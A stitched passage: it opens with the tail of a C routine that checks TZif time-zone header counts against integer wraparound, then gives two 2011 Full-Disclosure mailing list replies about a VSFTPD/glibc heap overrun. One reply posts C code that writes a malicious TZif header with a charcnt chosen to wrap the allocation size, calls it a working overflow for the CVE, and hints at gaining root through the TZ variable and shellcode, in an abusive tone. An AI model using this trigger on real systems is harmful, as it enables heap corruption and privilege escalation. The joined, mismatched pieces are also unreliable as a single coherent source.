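    uint32_t typecnt  = get_be32(hdr + 36), charcnt  = get_be32(hdr + 40);
    /* Bound every count before doing arithmetic on it: an oversized charcnt
     * is exactly what makes an unchecked sum wrap to a small allocation. */
    if (timecnt > TZIF_MAX_COUNT || typecnt > TZIF_MAX_COUNT ||
        charcnt > TZIF_MAX_COUNT || leapcnt > TZIF_MAX_COUNT ||
        isstdcnt > typecnt || isgmtcnt > typecnt)
        return 0;
    size_t total = 0;
    if (!add_checked(&total, (size_t)timecnt * 5)) return 0;  /* time + type index */
    if (!add_checked(&total, (size_t)typecnt * 6)) return 0;  /* ttinfo on disk */
    if (!add_checked(&total, charcnt))             return 0;  /* abbreviation chars */
    if (!add_checked(&total, (size_t)leapcnt * 8)) return 0;  /* leap second pairs */
    if (!add_checked(&total, (size_t)isstdcnt + isgmtcnt)) return 0;
    return total;
}

/* Constructed 44-byte header for demonstration; returns a static buffer. */
unsigned char *tzif_make_header(uint32_t timecnt, uint32_t typecnt, uint32_t charcnt) {
    static unsigned char hdr[TZIF_HDR_LEN];
    memset(hdr, 0, sizeof hdr);
    memcpy(hdr, "TZif", 4);
    put_be32(hdr + 32, timecnt);
    put_be32(hdr + 36, typecnt);
    put_be32(hdr + 40, charcnt);
    return hdr;
}

int main(void) {
    /* small plausible zone (2 transitions, 1 type, 4 name bytes) -> 20;
     * the posted trick, charcnt chosen to wrap the sum -> 0 (rejected) */
    printf("%zu\n", tzif_checked_size(tzif_make_header(2, 1, 4), TZIF_HDR_LEN));
    printf("%zu\n", tzif_checked_size(tzif_make_header(500, 0, 0u - 2500u), TZIF_HDR_LEN));
    return 0;
}
```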



Re: [Full-disclosure] Fwd: VSFTPD Remote Heap Overrun (low severity)

2011-12-09 Thread GloW - XD
There is, an exploit for this.. if you look around... it also,
works...and, u do have the src... i will pastebin it, just to make sure
no one cries :s

#include <stdio.h>
#include <stdint.h>
#include <time.h>
#include <string.h>

#define TZ_MAGIC "TZif"

/* store a 32-bit value big-endian, as the TZif format requires */
#define PUT_32BIT_MSB(cp, value)    \
do {                                \
    (cp)[0] = (value) >> 24;        \
    (cp)[1] = (value) >> 16;        \
    (cp)[2] = (value) >> 8;         \
    (cp)[3] = (value);              \
} while (0)

/* TZif file header, same layout as glibc's tzfile.c */
struct tzhead {
    char tzh_magic[4];
    char tzh_version[1];
    char tzh_reserved[15];
    char tzh_ttisgmtcnt[4];
    char tzh_ttisstdcnt[4];
    char tzh_leapcnt[4];
    char tzh_timecnt[4];
    char tzh_typecnt[4];
    char tzh_charcnt[4];
};
struct ttinfo {
    long int offset;
    unsigned char isdst;
    unsigned char idx;
    unsigned char isstd;
    unsigned char isgmt;
};

int main(void) {
    struct tzhead evil;
    int i;
    char *p;
    uint32_t total_size;
    uint32_t evil1, evil2;
    memcpy(evil.tzh_magic, TZ_MAGIC, sizeof(TZ_MAGIC) - 1);
    evil.tzh_version[0] = 0;
    memset(evil.tzh_reserved, 0, sizeof(evil.tzh_reserved));
    memset(evil.tzh_ttisgmtcnt, 0, sizeof(evil.tzh_ttisgmtcnt));
    memset(evil.tzh_ttisstdcnt, 0, sizeof(evil.tzh_ttisstdcnt));
    memset(evil.tzh_leapcnt, 0, sizeof(evil.tzh_leapcnt));
    memset(evil.tzh_typecnt, 0, sizeof(evil.tzh_typecnt));
    /* transition count, and a charcnt chosen so the summed size wraps */
    evil1 = 500;
    PUT_32BIT_MSB(evil.tzh_timecnt, evil1);
    total_size = evil1 * (sizeof(time_t) + 1);
    total_size = ((total_size + __alignof__ (struct ttinfo) - 1)
                  & ~(__alignof__ (struct ttinfo) - 1));
    evil2 = 0 - total_size;
    PUT_32BIT_MSB(evil.tzh_charcnt, evil2);
    /* write the header to stdout, followed by a few filler bytes */
    p = (char *)&evil;
    for (i = 0; i < sizeof(evil); i++)
        printf("%c", p[i]);
    /* putenv("TZ=`pwd`/%s",evil);  -- as posted; putenv() takes one string, so disabled */
    for (i = 0; i < 5; i++)
        //printf("[+] Got root ..\n");
        printf("A");
    return 0;
}

Sorry but, i did remove the exec line and setuid but, also you must
setenv TZ=/path/to/nice/shell, and then you might get somewhere... it
is tricky, as there is the setenv, which can be done, i have made that
happen, but, it takes another .c file for this... but, i did also,
modify this original one by someone else, which, only prints... the
overflow and trigger... but, to get root, you must play with bash
a little... but yea, it is very much also a problem, anyhow, i was
recently involved with tzdata patch, and, i had reported bugs going
back ages... anyhow, thx to dividead for his Timezone stuff... but, it
is a tricky one... but, very good :P , like, if setup similar to a
sendpage socket to socket, you may be able to send shellcode, to
unset/setenv TZ= , so then it can exec, but, unless it calls that
before adding setuid(0); etc... it wont work on prolly, anything...
dividead made a great post on it but, i have already hinted at bugs in
glib b4, guess, i dont like to give away, what kids dont need...
anyhow this is working buffer overflow for that CVE exactly.
have fucking fun assholes ./rant



Re: [Full-disclosure] Fwd: VSFTPD Remote Heap Overrun (low severity)

2011-12-09 Thread GloW - XD
http://dividead.wordpress.com/tag/heap-overflow/


oh wow, amazing, someone has already posted but, anyhow, the things
explained, here...and yes, if it overflows then ofc it can lead to
possible root

fucuall fd
/XD


